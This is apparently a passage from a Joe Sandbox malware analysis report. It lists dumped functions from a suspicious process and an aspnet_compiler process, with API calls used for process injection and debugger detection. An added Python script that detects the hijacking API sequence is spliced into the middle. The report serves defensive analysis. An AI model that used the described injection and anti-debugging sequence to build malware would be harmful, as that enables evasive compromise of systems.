• ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 00CF7BBA
Memory Dump Source
• Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: 8254fd9e945eea9602b74f33fd94d32d19a3994c2b185359d0732bfd5942d4ad
• Instruction ID: 5081859560c54f257278153d254bcb3d07cbc41cfb2786647928f824ba9aa437
• Opcode Fuzzy Hash: 8254fd9e945eea9602b74f33fd94d32d19a3994c2b185359d0732bfd5942d4ad
• Instruction Fuzzy Hash: B541ACB9D04258DFCF10CFA9D980AEEFBB1BB09310F14942AE815B7200D775A945CF68

Control-flow Graph
• Blocks and edges: 711 cf7b03-cf7bca ReadProcessMemory 714 cf7bcc-cf7bd2 711->714 715 cf7bd3-cf7c25 711->715 714->715
APIs
• ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 00CF7BBA
Memory Dump Source
• Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: 1ab9425b13c437e994668ba54b88f7a24f4144676117f56834be499ba611a421
• Instruction ID: ea4285b768b77e1d48e5f05f8c3ce8ccdb930a279f815f7cdc5e356658ddccfd
• Opcode Fuzzy Hash: 1ab9425b13c437e994668ba54b88f7a24f4144676117f56834be499ba611a421
• Instruction Fuzzy Hash: B641CCB9D04258DFCF14CFA9D980AEEFBB1BB09310F14942AE815B7200D735A945CF68

Control-flow Graph
• Blocks and edges: 729 cf7889-cf794a VirtualAllocEx 732 cf794c-cf7952 729->732 733 cf7953-cf799d 729->733 732->733
APIs
• VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 00CF793A
Memory Dump Source
• Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 5be656a08587b00ca5db7aaac5ba56c00f09cb0cc5c098710aed1f2365903695
• Instruction ID: 76533fd3df2528994419e6866c1a046b3a065623831cd0166d1c8313d5fcdc6a
• Opcode Fuzzy Hash: 5be656a08587b00ca5db7aaac5ba56c00f09cb0cc5c098710aed1f2365903695
• Instruction Fuzzy Hash: 6831A7B9D05258DFCF14CFA9D880AAEBBB1FB49310F14902AE815B7210D775A945CF58

Control-flow Graph
• Blocks and edges: 738 cf7890-cf794a VirtualAllocEx 741 cf794c-cf7952 738->741 742 cf7953-cf799d 738->742 741->742
APIs
• VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 00CF793A
Memory Dump Source
• Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 14caf5b275bb895d56de2969ac73614990347bfb88c428d929af1d2dba4703b8
• Instruction ID: 496eb754f3cdecbf10ca87825a214b0969c4af5f3969098482ce5297b41b6b50
• Opcode Fuzzy Hash: 14caf5b275bb895d56de2969ac73614990347bfb88c428d929af1d2dba4703b8
• Instruction Fuzzy Hash: 8231A6B9D042589FCF10CFA9D880AAEFBB1FB09310F10902AE815B7200D775A902CF58

Control-flow Graph
• Blocks and edges: 747 cf7760-cf77c8 749 cf77df-cf7827 Wow64SetThreadContext 747->749 750 cf77ca-cf77dc 747->750 752 cf7829-cf782f 749->752 753 cf7830-cf787c 749->753 750->749 752->753
APIs
• Wow64SetThreadContext.KERNEL32(?,?), ref: 00CF7817
Memory Dump Source
• Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
Similarity
• API ID: ContextThreadWow64
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 983334009-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 2cb463bf7915ada27055b91e21ae3abc0a926855a3dee275a1626339f8ee5f5a
                                                                                                                                                                                                                                                                                        • Instruction ID: 1db778477df6a202b803befea6959bef01129d58bd59f59f13749f06defc1fc5
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2cb463bf7915ada27055b91e21ae3abc0a926855a3dee275a1626339f8ee5f5a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5041CBB5D01258DFDB14CFAAD884AEEBBF1BF49310F24802AE419B7240D739A945CF54

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 764 cf1bd8-cf1c8f VirtualProtect 766 cf1c98-cf1cd4 764->766 767 cf1c91-cf1c97 764->767 767->766
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • VirtualProtect.KERNEL32(?,?,?,?), ref: 00CF1C7F
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 38816bb49c0f460863998e088344ec6d38745d435801b4b3cb15349a41d06b4f
                                                                                                                                                                                                                                                                                        • Instruction ID: 7376bdc2fcd95f72e7ed6a9e3fdd7a20005f8a42b73f57260078eb353cc27a14
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 38816bb49c0f460863998e088344ec6d38745d435801b4b3cb15349a41d06b4f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 543198B9D01258DFCB14CFAAD580AEEFBF0AB09310F24902AE814B7310D375A945CF64

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 758 cf1bd7-cf1c8f VirtualProtect 760 cf1c98-cf1cd4 758->760 761 cf1c91-cf1c97 758->761 761->760
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • VirtualProtect.KERNEL32(?,?,?,?), ref: 00CF1C7F
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 339f38837005a83bb5a0340f9cd2297be00575139b279505ec4c07683c01f1a5
                                                                                                                                                                                                                                                                                        • Instruction ID: d943d36221c5f5341278bb26d3a7475c9b828f672b466103536db6d1674f0f6e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 339f38837005a83bb5a0340f9cd2297be00575139b279505ec4c07683c01f1a5
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EA3188B9D05258DFCB14CFA9D580AEEFBF0AB19310F24902AE815B7210D375A945CF64

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 770 cf7768-cf77c8 772 cf77df-cf7827 Wow64SetThreadContext 770->772 773 cf77ca-cf77dc 770->773 775 cf7829-cf782f 772->775 776 cf7830-cf787c 772->776 773->772 775->776
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 00CF7817
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ContextThreadWow64
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 983334009-0
                                                                                                                                                                                                                                                                                        • Opcode ID: d6b2cb7521f6e51e740a2ca14d8eeb484755f133c7eec921470bbbe22eac148c
                                                                                                                                                                                                                                                                                        • Instruction ID: 4b73c044912607cb8e7b37036615d0860baf98b799238d6288eb6c2a7a40e5a4
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d6b2cb7521f6e51e740a2ca14d8eeb484755f133c7eec921470bbbe22eac148c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0231DBB5D01258DFDB14CFAAD884AEEFBF1BB48310F24802AE418B7240D779A945CF54
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ResumeThread
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 947044025-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 4e9ab81e96bdb2e261cf8babd64656ff2e8231c725cf79c315962890d3153e4e
                                                                                                                                                                                                                                                                                        • Instruction ID: a8228c907b497d12481ac7e712e59e533b8b0920274dda0a80501998b60b8c62
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4e9ab81e96bdb2e261cf8babd64656ff2e8231c725cf79c315962890d3153e4e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8131CBB8D052589FCB14CFAAD884AEEFBB4BB49310F14942AE815B7300D775A901CF98

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 781 cf7677-cf7706 ResumeThread 784 cf770f-cf7751 781->784 785 cf7708-cf770e 781->785 785->784
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_cf0000_QWQWSAADAF.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ResumeThread
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 947044025-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 5b285f1616a3ef6f73c52524ea9b05fb1f3657b434a1f1bf1d7a590187881ac0
                                                                                                                                                                                                                                                                                        • Instruction ID: 15663fadc427fac9badf1e3eb0cb21561b5c04ae95de7a60869ac47bdc5f264b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5b285f1616a3ef6f73c52524ea9b05fb1f3657b434a1f1bf1d7a590187881ac0
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D831CBB8D052589FCF14CFA9D884AEEFBB0BB49310F24942AE815B7300C775A901CF58
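The entries above all belong to one dumped region (process 11, dump 2, base 00CF0000, per the Source File and Snapshot File lines) and between them reference VirtualProtect, Wow64SetThreadContext and ResumeThread, the call sequence used to point a suspended 32-bit process's thread at injected code and let it run. They also list the same code twice from start addresses one or eight bytes apart (cf1bd7/cf1bd8, cf7760/cf7768), each pair referencing the same call site. The script below is an added example, not part of the report or of Joe Sandbox tooling: it parses entries in the line layout shown on this page (an assumption; other report versions may differ), rebuilds the flattened control_flow_graph lines into blocks and edges, flags regions that carry the whole API triad, and pairs up the overlapping duplicates. The embedded sample is constructed by abridging four of the entries above.

```python
"""Triage helper for the per-function disassembly entries of a Joe Sandbox report.

Added example, not part of the report or of Joe Sandbox; the line layout is
inferred from this page alone. It rebuilds each flattened control-flow graph,
groups functions by dumped region, flags the VirtualProtect + Wow64SetThreadContext
+ ResumeThread combination that characterises thread-context hijacking of a
suspended 32-bit process, and spots code disassembled twice from overlapping starts.
"""
import re
from collections import defaultdict

HIJACK_APIS = {"VirtualProtect", "Wow64SetThreadContext", "ResumeThread"}
API_RE = re.compile(r"^•\s*(\w+)\.(\w+)\((.*?)\),\s*ref:\s*([0-9A-Fa-f]+)", re.M)
RANGE_RE = re.compile(r"^[0-9a-f]+-[0-9a-f]+$")

def field(text, label):
    """Value of a '• Label: value' line, '' when the report left it empty."""
    m = re.search(re.escape(label) + r":\s*([^,\s]*)", text)
    return m.group(1) if m else ""

def parse_cfg(tokens):
    """Rebuild nodes and edges from the flattened 'id lo-hi [Api] id->id ...' stream."""
    nodes, edges, pending, current = {}, [], None, None
    for tok in tokens.split():
        if "->" in tok:
            edges.append(tuple(int(x) for x in tok.split("->")))
        elif tok.isdigit():
            pending = int(tok)
        elif RANGE_RE.match(tok) and pending is not None:
            lo, hi = (int(x, 16) for x in tok.split("-"))
            nodes[pending] = {"start": lo, "end": hi, "api": None}
            current, pending = pending, None
        elif current is not None:  # bare identifier after a range: API called in that block
            nodes[current]["api"] = tok
    return nodes, edges

def parse_entry(text):
    """One function entry to a dict; an entry without a graph keeps start=None."""
    cfg = re.search(r"^control_flow_graph\s+(.*)$", text, re.M)
    nodes, edges = parse_cfg(cfg.group(1)) if cfg else ({}, [])
    return {"start": min((n["start"] for n in nodes.values()), default=None),
            "nodes": nodes, "edges": edges,
            "apis": [(m.group(1), int(m.group(4), 16)) for m in API_RE.finditer(text)],
            "source": field(text, "Source File"), "api_id": field(text, "API ID"),
            "ifh": field(text, "Instruction Fuzzy Hash")}

def hijack_regions(entries):
    """Dumped regions whose functions together call the whole triad (APIs list or graph)."""
    by_region = defaultdict(set)
    for e in entries:
        by_region[e["source"]] |= {a for a, _ in e["apis"]}
        by_region[e["source"]] |= {n["api"] for n in e["nodes"].values() if n["api"]}
    return sorted(src for src, names in by_region.items() if HIJACK_APIS <= names)

def overlapping_duplicates(entries, slack=16):
    """Pairs in one region starting within `slack` bytes and sharing a call site: same code twice."""
    known = [e for e in entries if e["start"] is not None]
    dups = []
    for i, a in enumerate(known):
        for b in known[i + 1:]:
            shared = {r for _, r in a["apis"]} & {r for _, r in b["apis"]}
            if a["source"] == b["source"] and abs(a["start"] - b["start"]) <= slack and shared:
                dups.append((min(a["start"], b["start"]), max(a["start"], b["start"]), sorted(shared)))
    return dups

def nibble_similarity(h1, h2):
    """Position-wise agreement of two hex fuzzy hashes; assumes (unverified) the hash is positional."""
    if not h1 or len(h1) != len(h2):
        return 0.0
    return sum(a == b for a, b in zip(h1.upper(), h2.upper())) / len(h1)

# Constructed sample, abridged from four entries on this page: section headers and the
# Opcode/Instruction IDs are dropped; the ResumeThread entry has no APIs line, as on the page.
SRC = ("• Source File: 0000000B.00000002.1363825424.0000000000CF0000.00000040.00000800"
       ".00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false")
SAMPLE = f"""\
control_flow_graph 747 cf7760-cf77c8 749 cf77df-cf7827 Wow64SetThreadContext 747->749 750 cf77ca-cf77dc 747->750 752 cf7829-cf782f 749->752 753 cf7830-cf787c 749->753 750->749 752->753
• Wow64SetThreadContext.KERNEL32(?,?), ref: 00CF7817
{SRC}
• API ID: ContextThreadWow64
• Instruction Fuzzy Hash: 5041CBB5D01258DFDB14CFAAD884AEEBBF1BF49310F24802AE419B7240D739A945CF54
control_flow_graph 764 cf1bd8-cf1c8f VirtualProtect 766 cf1c98-cf1cd4 764->766 767 cf1c91-cf1c97 764->767 767->766
• VirtualProtect.KERNEL32(?,?,?,?), ref: 00CF1C7F
{SRC}
• API ID: ProtectVirtual
• Instruction Fuzzy Hash: 543198B9D01258DFCB14CFAAD580AEEFBF0AB09310F24902AE814B7310D375A945CF64
control_flow_graph 758 cf1bd7-cf1c8f VirtualProtect 760 cf1c98-cf1cd4 758->760 761 cf1c91-cf1c97 758->761 761->760
• VirtualProtect.KERNEL32(?,?,?,?), ref: 00CF1C7F
{SRC}
• API ID: ProtectVirtual
• Instruction Fuzzy Hash: EA3188B9D05258DFCB14CFA9D580AEEFBF0AB19310F24902AE815B7210D375A945CF64
control_flow_graph 781 cf7677-cf7706 ResumeThread 784 cf770f-cf7751 781->784 785 cf7708-cf770e 781->785 785->784
{SRC}
• API ID: ResumeThread
• Instruction Fuzzy Hash: D831CBB8D052589FCF14CFA9D884AEEFBB0BB49310F24942AE815B7300C775A901CF58
"""
ENTRIES = [parse_entry(c) for c in re.split(r"\n(?=control_flow_graph)", SAMPLE.strip())]
```

Calling `hijack_regions(ENTRIES)` returns the single CF0000 region, and `overlapping_duplicates(ENTRIES)` returns the cf1bd7/cf1bd8 pair with their shared call site 00CF1C7F. The triad check is deliberately per region rather than per function: the hijacking sequence is split across several small functions here, so a per-function rule would miss it. `nibble_similarity` is only a rough proxy for the report's own Similarity section, because the construction of its fuzzy hash is not documented on this page; use it to cluster near-identical functions for manual review, not as a verdict.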
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1363446866.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_c9d000_QWQWSAADAF.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 31204381328e78a0e48fbdc10e95fb9ba02c8af1be575e2c0e477f4cbde3a3de
                                                                                                                                                                                                                                                                                        • Instruction ID: a925efbd0ddb2a616fe3c741a185e5f7cdca087cd8dc865bd1d2e3d3d99de150
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 31204381328e78a0e48fbdc10e95fb9ba02c8af1be575e2c0e477f4cbde3a3de
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6E212572504304DFDF14DF10D9C8B16BB65FB98314F24C5A9E90A1B256C33AE856CAA2
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1363446866.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_c9d000_QWQWSAADAF.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: d9ad3efc35fa8b416f73e6fd9b5130605c5b10339b4c796a30493a3edbfb8fe1
                                                                                                                                                                                                                                                                                        • Instruction ID: 367901f1fd53a630acdc7329e0f6372709a20348b87d76e8942a5b895f7d1399
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d9ad3efc35fa8b416f73e6fd9b5130605c5b10339b4c796a30493a3edbfb8fe1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6B11AF76504244CFCF15CF10D5C4B16BF61FB94324F24C5A9D8095B656C33AE956CBA1

Execution Graph

Execution Coverage:8.5%
Dynamic/Decrypted Code Coverage:100%
Signature Coverage:60%
Total number of Nodes:5
Total number of Limit Nodes:0
[Execution graph: 1607298 -> 16072dc CheckRemoteDebuggerPresent -> 160731e; 696c8f8 DuplicateHandle -> 696c98e]

Executed Functions

Control-flow Graph

• Executed
• Not Executed
[Control-flow graph: block 1607298-160731c (CheckRemoteDebuggerPresent) branches to 160731e-1607324 and 1607325-1607360; 160731e-1607324 falls through to 1607325-1607360]
APIs
• CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 0160730F
Memory Dump Source
• Source File: 0000000C.00000002.2451093874.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1600000_aspnet_compiler.jbxd
Similarity
• API ID: CheckDebuggerPresentRemote
• String ID:
• API String ID: 3662101638-0
• Opcode ID: 1654bf746b93516bb9658a5e9d6da061ea5420c93c7f3b4c5d662ea801c996ac
• Instruction ID: 6666e49f9e7789eacaf0c0b0e184aa6a673a8696f2077a6d16e22d77e12b5409
• Opcode Fuzzy Hash: 1654bf746b93516bb9658a5e9d6da061ea5420c93c7f3b4c5d662ea801c996ac
• Instruction Fuzzy Hash: 6F2136B1801259CFDB14CF9AC844BEEBBF4AF48310F14841AE855A3340D778A944CF64

Control-flow Graph

• Executed
• Not Executed
[Control-flow graph: block 1607291-160731c (CheckRemoteDebuggerPresent) branches to 160731e-1607324 and 1607325-1607360; 160731e-1607324 falls through to 1607325-1607360]
APIs
• CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 0160730F
Memory Dump Source
• Source File: 0000000C.00000002.2451093874.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_1600000_aspnet_compiler.jbxd
Similarity
• API ID: CheckDebuggerPresentRemote
• String ID:
• API String ID: 3662101638-0
• Opcode ID: 672b0b6b2ba619b30a7f144c58fb32a17c1c1e8cb8a7e97b68c56494e8469b0e
• Instruction ID: 165c935586a769e811e8673e5137abd8c44bc8ad3668819c64ca3176df7e9590
• Opcode Fuzzy Hash: 672b0b6b2ba619b30a7f144c58fb32a17c1c1e8cb8a7e97b68c56494e8469b0e
• Instruction Fuzzy Hash: 732136B6C01259CFDB14CF9AC885BEEBBF4AF48210F15841AE855A7380D338A944CF64

Control-flow Graph

• Executed
• Not Executed
[Control-flow graph: block 696c8f0-696c98c (DuplicateHandle) branches to 696c98e-696c994 and 696c995-696c9b2; 696c98e-696c994 falls through to 696c995-696c9b2]
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0696C97F
Memory Dump Source
• Source File: 0000000C.00000002.2460157637.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_6960000_aspnet_compiler.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 5f4df830d3b9af17b7eeb1a4324d3983f357d755c74439c4b442f2d3e7680b21
• Instruction ID: 58208d5bc3712ce05094da12f5ddd38cab7fbbaa2e9e4a065841930b7bfcaf9a
• Opcode Fuzzy Hash: 5f4df830d3b9af17b7eeb1a4324d3983f357d755c74439c4b442f2d3e7680b21
• Instruction Fuzzy Hash: E62103B5D01308DFDB10CFAAD984ADEBBF5EB48314F24841AE858A7750D339A940CFA0

Control-flow Graph

• Executed
• Not Executed
[Control-flow graph: block 696c8f8-696c98c (DuplicateHandle) branches to 696c98e-696c994 and 696c995-696c9b2; 696c98e-696c994 falls through to 696c995-696c9b2]
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0696C97F
Memory Dump Source
• Source File: 0000000C.00000002.2460157637.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_6960000_aspnet_compiler.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
                                                                                                                                                                                                                                                                                        • Opcode ID: c9b3c977dddcc8d26820634c424ae58807c2483b87736a89fd8fa2dfaee37d46
                                                                                                                                                                                                                                                                                        • Instruction ID: 51ae919ccb6dfba5977c3480b1f835b62293f625d9f2c3b8e906b45546e373cc
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c9b3c977dddcc8d26820634c424ae58807c2483b87736a89fd8fa2dfaee37d46
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BB21D2B5D01348DFDB10CFAAD884ADEBBF8EB48314F14841AE958A7350D375A940CFA4
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2449766534.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_157d000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 48333ffade1efef6198254ed9b4777f3a81127e984adb911c0e30962bc08783e
                                                                                                                                                                                                                                                                                        • Instruction ID: 0ab0fee7851cead2a0b9dd5401ea8966e02bf2139f0bbd22b4bc0a02a596ab9e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 48333ffade1efef6198254ed9b4777f3a81127e984adb911c0e30962bc08783e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C2210075604200DFDB16DF54E980B26BBB5FF84314F24C96DE90A4F282D33AD407CA62
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2449766534.000000000157D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0157D000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_157d000_aspnet_compiler.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 0dc1ea1169e633858e86da044e7df9594a0d79749321a160b0992fdcdfff8e91
                                                                                                                                                                                                                                                                                        • Instruction ID: bd5e1a90d6bbd2a6b32f2354b3e53b9dccbf6e566abf11e5cf333ca9ab4b6d21
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0dc1ea1169e633858e86da044e7df9594a0d79749321a160b0992fdcdfff8e91
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 952168755093808FDB13CF24D990B15BF71BF46214F28C5EAD8498F6A7D33A980ACB62